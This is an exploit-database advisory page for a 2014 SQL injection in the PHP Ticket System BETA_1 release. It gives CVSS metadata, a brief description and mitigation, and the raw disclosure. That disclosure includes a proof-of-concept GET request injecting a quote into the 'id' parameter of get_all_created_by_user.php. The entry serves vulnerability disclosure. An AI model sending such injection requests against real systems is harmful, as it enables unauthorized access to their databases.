PHP Ticket System SQL Injection

vendor:

PHP Ticket System

by:

HauntIT Blog

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: PHP Ticket System

Affected Version From: BETA_1.zip

Affected Version To: BETA_1.zip

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2014

PHP Ticket System SQL Injection

An SQL injection vulnerability exists in the PHP Ticket System BETA_1.zip, which allows an attacker to inject malicious SQL queries via the 'id' parameter in the 'get_all_created_by_user.php' script.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# ==============================================================
# Title ...| PHP Ticket System SQL Injection
# Version .| BETA_1.zip
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....| http://sourceforge.net/projects/phpticketsystem/
# ==============================================================

 
# ==============================================================
# SQL Injection

---<request>---
GET /k/cms/beta/mods/tickets/data/get_all_created_by_user.php?id='mynameissqli&sort%5B0%5D%5Bfield%5D=undefined&sort%5B0%5D%5Bdir%5D=desc HTTP/1.1
Host: 10.149.14.62
---<request>---


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/